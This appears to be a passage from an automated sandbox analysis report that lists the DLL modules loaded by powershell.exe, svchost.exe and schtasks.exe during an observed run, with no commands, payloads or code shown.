                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: websocket.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
